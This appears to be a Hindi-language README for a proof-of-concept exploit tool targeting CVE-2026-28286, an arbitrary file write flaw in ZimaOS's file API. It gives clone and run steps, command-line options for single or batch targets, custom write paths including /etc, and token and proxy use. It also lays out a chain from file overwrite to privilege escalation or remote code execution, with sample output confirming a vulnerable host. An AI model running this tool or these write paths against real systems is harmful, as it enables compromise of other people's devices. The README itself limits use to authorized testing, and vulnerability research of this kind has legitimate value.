
CVE-2026-28286 के लिए PoC और सत्यापन टूलकिट, जो ZimaOS में एक मनमाना फ़ाइल लेखन भेद्यता है, जो इच्छित निर्देशिकाओं के बाहर फ़ाइलें लिखने के लिए API मिसकॉन्फ़िगरेशन का शोषण करती है।
API मिसकॉन्फ़िगरेशन → मनमाना फ़ाइल लेखन → संभावित सिस्टम समझौता
/v2_1/files/filegit clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py
आप निम्न का उपयोग करके सभी उपलब्ध विकल्प देख सकते हैं:
python poc.py -h
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]
options:
-h, --help show help message and exit
-u, --url URL Single target URL
-t, --targets TARGETS Targets file (batch mode)
-p, --path PATH Custom file path (default: /tmp)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--token TOKEN Bearer authentication token
-n, --attempts Number of attempts
--delay Delay between batch requests (seconds)
python poc.py
python poc.py -u http://localhost:8080
python poc.py -u http://localhost:8080 -p /tmp
python poc.py -u http://localhost:8080 -p /etc
python poc.py -u http://localhost:8080 -n 5
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080
python poc.py -t targets.txt
python poc.py -t targets.txt --delay 2
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN
Burp Suite के साथ प्रॉक्सी मोड का उपयोग करें:
बैकएंड फ़ाइलसिस्टम सीमाओं को लागू करने में विफल रहता है:
यह निम्न में लिखने की अनुमति देता है:
/tmp/
/etc/
/usr/local/bin/
मनमाना फ़ाइल लेखन
↓
कॉन्फ़िग / स्क्रिप्ट अधिलेखित करें
↓
विशेषाधिकार वृद्धि / RCE

[✔] CONFIRMED vulnerable (LISTING_SUCCESS)
Path: /tmp/CVE-2026-28286_⚠️_abc123.txt
यदि आपको यह उपयोगी लगा, तो एक स्टार ⭐ देने पर विचार करें यह अधिक शोधकर्ताओं को इस कार्य को खोजने में मदद करता है।
केवल अधिकृत परीक्षण के लिए।